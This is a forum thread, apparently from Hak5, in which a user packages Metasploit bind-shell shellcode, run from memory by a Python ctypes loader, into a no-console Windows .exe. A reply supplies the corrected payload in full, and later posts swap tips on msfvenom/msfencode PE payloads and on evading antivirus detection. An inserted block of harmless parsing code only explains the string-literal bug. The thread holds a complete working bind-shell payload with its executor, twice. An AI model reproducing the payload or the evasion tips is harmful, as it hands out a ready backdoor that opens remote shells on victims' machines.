Python/c Problem


Hello hak5,

I am having an issue getting C shellcode to compile from within a python script. What I am trying to do is use pyinstaller to make an .exe out of a python script.

from ctypes import *


shellcode = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"

memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()

The above is the script I want to create a .exe out of. The shellcode is in C and it was generated via the following command and pasted into the script.

./msfpayload windows/shell_bind_tcp C 

Now when I try to build an .exe out of it using pyinstaller, I issue the following:

$ python Configure.py
....
*completes successfully*

$ python Makespec.py --onefile --noconsole pyshell.py
wrote /home/pyinstaller-1.5.1/pyshell/pyshell.spec
now run Build.py to build the executable

$ python Build.py pyshell/pyshell.spec
checking Analysis
building Analysis because outAnalysis0.toc non existent
running Analysis outAnalysis0.toc
Analyzing: support/_mountzlib.py
Analyzing: support/useUnicode.py
Analyzing: pyshell.py
Traceback (most recent call last):
  File "Build.py", line 1494, in <module>
    main(args[0], configfilename=opts.configfile)
  File "Build.py", line 1472, in main
    build(specfile)
  File "Build.py", line 1429, in build
    execfile(spec)
  File "pyshell/pyshell.spec", line 3, in <module>
    pathex=['/home/pyth0n/Desktop/works_in_progress/pyinstaller/pyinstaller-1.5.1'])
  File "Build.py", line 347, in __init__
    self.__postinit__()
  File "Build.py", line 298, in __postinit__
    self.assemble()
  File "Build.py", line 416, in assemble
    analyzer.analyze_script(script)
  File "/home/pyth0n/Desktop/works_in_progress/pyinstaller/pyinstaller-1.5.1/mf.py", line 565, in analyze_script
    co = compile(string.replace(stuff, "\r\n", "\n"), fnm, 'exec')
ValueError: invalid \x escape

It appears that the script is being run and Python is literally interpreting the \x as an escape, and I want it to read it as a regular string without paying any mind to the contents. Presumably it will go on to compile it and give me the .exe, and it would be Windows ready.

Also tried playing with the syntax of the shellcode, removing the ' and " characters to no avail.

Anyone know what's going on here?

Edited by bobbyb1980

Try this:

shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")

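Why the parenthesized form above fixes the build and the original layout does not: Python only joins adjacent string literals inside one expression, so without the parentheses the first line is the assignment and every following line is a separate, discarded statement. The example below is added here and is not code from either post; it parses both layouts with the ast module using constructed, harmless byte segments in place of the payload fragments, and shows what a malformed \x escape (a \x not followed by two hex digits, the error the traceback reports) does at compile time.

```python
import ast

# Constructed sample segments (plain ASCII bytes, not the post's payload):
# stand-ins for the per-line "\x.." fragments shown in the thread.
SEGMENTS = ['"\\x41\\x42\\x43"', '"\\x44\\x45"', '"\\x46\\x47\\x48\\x49"']


def unparenthesized(segments):
    """The original layout: one assignment followed by bare literal lines."""
    return "shellcode = " + "\n".join(segments) + "\n"


def parenthesized(segments):
    """The layout from the reply: one parenthesized, implicitly joined literal."""
    return "shellcode = (" + "\n".join(segments) + ")\n"


def analyse(source):
    """Parse SOURCE; return (number of top-level statements,
    number of characters actually bound to the name 'shellcode')."""
    tree = ast.parse(source)
    assigned = None
    for node in tree.body:
        if isinstance(node, ast.Assign) and node.targets[0].id == "shellcode":
            assigned = len(node.value.value)  # ast.Constant holds the joined text
    return len(tree.body), assigned


def bad_escape_message(source):
    """Return the compile-time error text for SOURCE, or None if it compiles.
    A '\\x' without two hex digits is rejected when the literal is compiled:
    ValueError ('invalid \\x escape') on Python 2, SyntaxError on Python 3."""
    try:
        compile(source, "<string>", "exec")
    except (SyntaxError, ValueError) as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    # Original layout: 3 statements, only the first 3 characters are kept.
    print("unparenthesized:", analyse(unparenthesized(SEGMENTS)))
    # Reply's layout: 1 statement, all 9 characters are kept.
    print("parenthesized:  ", analyse(parenthesized(SEGMENTS)))
    # A truncated escape fails before the script ever runs.
    print("bad escape:     ", bad_escape_message('x = "\\xzz"\n'))
```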

I usually use msfpayload and msfencode with -t exe for kicking out payloads in PE form.

You can also do -f exe with msfvenom, iirc (don't have my bt5 vm up at the moment).

Thanks for the tip. You mean like piping msfpayload to msfencode (the same thing in essence as msfvenom, i.e. msfpayload multi/handler PAYLOAD=... | msfencode .... -o whatever.exe?) for an .exe? If I understand you right, I tried that but it was being picked up by most antivirus scanners.

I also tried msfvenom with various iteration combos with no luck. I think most of the AVs are going to detect msfencoded data.

Currently trying to learn shellcoding and it can be a real brain twister. Doing these labs, http://projectshellcode.com/?q=node/12 .


Actually I've had good success bypassing AV with Metasploit. Shellcode isn't too hard. Have you played with the nasm shell in Metasploit? Another easy way of messing with shellcode is to just load a regular program in OllyDbg, scroll down to the NULLs at the end of the section, hit space, and start typing your assembly. The debugger will display the opcodes in the column to the left of the instructions.
